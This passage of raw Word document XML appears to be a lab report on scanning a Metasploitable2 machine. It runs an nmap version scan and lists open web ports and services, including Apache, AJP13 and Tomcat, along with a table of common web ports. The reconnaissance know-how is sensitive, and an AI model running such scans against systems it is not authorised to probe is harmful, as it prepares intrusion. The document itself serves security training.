          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>page(s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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associated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panels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port(s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and service(s) are they associated with?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF133F8" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="1221"/>
      </w:pPr>
      <w:r>
        <w:t>Provide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>detailed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>explanation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 xml:space="preserve">task. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>[20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02636E64" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="9079"/>
        </w:tabs>
        <w:spacing w:before="153" w:line="440" w:lineRule="atLeast"/>
        <w:ind w:left="306" w:right="274"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FDEBF3"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Command: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo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C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.0.168</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E95C5" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:ind w:left="306"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Enables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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>version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68147D2F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="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3472" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CAFB1C1" wp14:editId="7B4344B4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104002</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5716786" cy="3735228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786" cy="3735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136404" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="190"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Web-related services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F0D588" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2271"/>
          <w:tab w:val="left" w:pos="2391"/>
        </w:tabs>
        <w:spacing w:before="46" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="3225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Apache httpd 2.2.8 ((Ubuntu) DAV/2) 8009/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>ajp13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Jserv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Protocol v1.3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>8180/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Tomcat/Coyote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493C816C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="117"/>
        <w:ind w:left="703"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EAF9683" wp14:editId="112E19CD">
            <wp:extent cx="84328" cy="84328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328" cy="8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b/>
        </w:rPr>
        <w:t>Port 80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Service detected as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Apache httpd 2.2.8. This is the default HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313DDCDC" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="44" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="1026" w:right="316"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upon manually visiting </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r>
          <w:t>http://192.168.0.168/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> in Firefox, the default Metasploitable2 web interface is observed, which includes links to multiple vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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DVWA,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>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t>PHPMyAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>This confirms port 80 hosts several web apps and control panels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4EA87C" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="1026" w:right="274" w:hanging="324"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30A08AC4" wp14:editId="19F84B03">
            <wp:extent cx="84328" cy="84328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328" cy="8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</w:rPr>
        <w:t>Port 8180/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Detected as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Apache Tomcat/Coyote JSP engine 1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Accessing </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:t>http://192.168.0.168:8180/</w:t>
        </w:r>
      </w:hyperlink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Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>displayed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>home</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>page,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">indicating that this port is used for managing Java-based web applications. This typically includes access to the Tomcat Manager (a control panel) if login credentials are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2583E" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18200909" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="80" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="1026" w:right="697" w:hanging="324"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="3"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65626257" wp14:editId="0A63A2EA">
            <wp:extent cx="84328" cy="84327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328" cy="8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</w:rPr>
        <w:t>Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>8009/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Detected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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ajp13,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Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tomcat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internal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>backend communication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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port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intended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direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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browser.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Visiting </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:t>http://192.168.0.168:8009/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> resulted in a "Connection Reset" error, as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20074ED3" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="316"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Based on this evidence, ports </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">80 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">8180 </w:t>
      </w:r>
      <w:r>
        <w:t>are directly associated with web applications and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panels.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>8009</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>supports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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Tomcat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 host a web-accessible interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367C31A" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="117"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>**Miscellaneous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB49D1A" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>What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to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Look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for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in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Nmap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to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Identify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Web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Services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or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Control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Panels?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FBD46D" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="3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5814"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D34AF" w14:paraId="2B0704E1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="397"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3511153E" w14:textId="77777777" w:rsidR="002D34A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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B68B57A" w14:textId="77777777" w:rsidR="002D34A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Typical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Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="6FFE1889" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4752F372" w14:textId="77777777" w:rsidR="002D34AF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5814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54522FBC" w14:textId="77777777" w:rsidR="002D34A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(default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web)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="4B434F68" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0200266D" w14:textId="77777777" w:rsidR="002D34AF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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ACED161" w14:textId="77777777" w:rsidR="002D34A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HTTPS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(encrypted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web)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="764B96AC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="398"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="704A191A" w14:textId="77777777" w:rsidR="002D34A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8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65B1EFDB" w14:textId="77777777" w:rsidR="002D34A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Alternative</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="4313A508" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CE036D3" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>8180</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A41DAF" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Tomcat,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apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="566820FD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63AEF14E" w14:textId="77777777" w:rsidR="002D34A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8443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496C2F87" w14:textId="77777777" w:rsidR="002D34A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Alternative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HTTPS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(often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Tomcat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="2D37C070" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="398"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73C666AB" w14:textId="77777777" w:rsidR="002D34AF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8000-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>9000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D5DA961" w14:textId="77777777" w:rsidR="002D34A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Often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dev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apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D34AF" w14:paraId="54A7CF4F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EDE4621" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="42"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">5000, 5601, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>15672</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5814" w:type="dxa"/>
